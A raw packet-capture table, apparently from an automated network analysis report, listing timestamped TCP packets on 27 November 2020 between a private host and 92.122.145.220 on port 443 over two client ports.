Nov 27, 2020 14:24:55.577094078 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.577122927 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.577147961 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.578737020 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.578814030 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.578825951 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.578875065 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.580406904 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.580508947 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.588928938 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.606633902 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.617360115 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.617413998 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.617547035 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.617574930 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.618076086 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.618172884 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.652687073 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.652846098 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.653779030 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.653856039 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.653902054 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.653932095 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.653975964 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.653994083 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.655035019 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.655101061 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.655152082 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.655169964 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.656676054 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.656740904 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.656774044 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.656805038 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.658318996 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.658385992 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.658420086 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.658451080 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.659981012 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.660054922 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.660087109 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.660115957 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.661645889 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.661709070 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.661746025 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.661767960 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.663324118 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.663403988 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.663441896 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.663544893 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.664993048 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.665066004 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.665108919 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.665132046 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.666649103 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.666721106 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.666760921 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.666817904 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.668351889 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.668418884 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.668459892 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.668497086 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.669945002 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.670032024 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.813956976 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.852572918 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.852636099 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.852819920 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.852875948 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.853235960 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.853287935 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.853343964 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.853369951 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.854899883 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.854943991 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.855000019 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.855025053 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.856550932 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.856724024 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.924844027 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.967721939 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.967869997 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.968154907 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.968272924 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.968379021 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.968420029 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.968486071 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.968549013 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.970139027 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.970180988 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.970299006 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.971743107 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.971781015 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.971832991 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.971934080 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.989670038 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.028424025 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.028456926 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.028523922 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.028561115 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.029090881 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.029114962 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.029154062 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.029181957 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.030761003 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.030785084 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.030827045 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.030855894 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.032469034 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.032494068 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.032532930 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.032560110 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.034077883 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.034101963 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.034148932 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.034176111 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.035772085 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.035799026 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.035845995 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.035873890 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.037441969 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.037470102 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.037528038 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.037584066 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.039093971 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.039124966 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.039180994 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.039208889 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.040767908 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.040797949 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.040849924 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.040873051 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.042414904 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.042449951 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.042515993 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.044075012 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.044105053 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.044121981 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.044152021 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.044173956 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.045728922 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.045753956 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.045808077 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.045833111 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.079145908 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.108318090 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.108406067 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.108572006 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.108613968 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.108920097 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.108961105 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.109008074 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.109046936 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.110646963 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.110692978 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.110734940 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.110774994 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.112327099 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.112382889 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.112411976 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.112440109 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.113972902 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.114016056 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.114054918 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.114082098 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.115628958 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.115684032 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.115714073 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.117307901 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.117352009 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.117362976 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.117419958 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.118429899 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.118900061 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.118943930 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.118973017 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.118994951 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.120584011 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.120624065 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.120668888 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.120695114 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.122281075 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.122324944 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.122360945 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.122384071 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.123928070 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.123966932 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.124008894 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.124030113 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.125593901 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.125637054 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.125673056 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.125693083 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.127275944 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.127319098 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.127367973 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.127402067 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.128972054 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.129029989 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.129072905 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.129117012 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.130580902 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.130624056 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.130669117 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.130703926 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.132251024 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.132317066 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.132379055 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.132419109 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.133891106 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.133934021 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.134026051 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.134176970 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.135571003 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.135615110 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.135657072 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.135670900 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.137310982 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.137361050 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.137396097 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.137413979 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.138901949 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.138945103 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.138983965 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.139003038 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.140544891 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.140583992 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.140620947 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.140640020 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.142251015 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.142302990 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.142333031 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.142354965 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.143894911 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.143959045 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.143979073 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.144007921 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.145582914 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.145649910 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.145675898 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.145709038 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.147260904 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.147327900 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.147347927 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.147383928 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.148895025 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.148940086 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.148972034 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.148993969 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.150527954 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.150567055 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.150603056 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.150629044 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.152239084 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.152285099 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.152317047 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.152338028 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.153727055 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.153770924 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.153795958 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.153816938 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.155219078 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.155267954 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.155293941 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.155319929 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.156610012 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.156656027 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.156697035 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.156714916 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.157929897 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.157968998 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.158039093 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.159240961 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.159307003 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.159311056 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.159328938 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.159358978 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.160451889 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.160491943 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.160567999 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.160617113 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.161640882 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.161731005 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.171463013 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.195900917 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.199872971 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.199944973 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.200011015 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.200046062 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.200105906 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.200165987 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.200206995 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.200247049 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.200248957 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.200335026 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.200985909 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.201031923 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.201071978 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.201076031 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.201129913 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.201809883 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.201863050 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.201903105 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.201921940 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.201957941 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.201983929 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.202584982 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.202613115 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.202640057 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.202677965 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.202719927 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.203402996 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.203433037 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.203465939 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.203500032 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.203556061 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.204278946 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.204314947 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.204349995 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.204375029 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.204446077 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.205101967 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.205132008 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.205169916 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.205193043 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.205252886 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.205929995 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.205969095 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.206008911 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.206008911 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.206135035 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.206738949 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.206777096 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.206815958 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.206871986 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.236514091 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.236552000 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.236665964 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.236702919 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.237231970 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.237268925 CET	443	49702	92.122.145.220	192.168.2.3
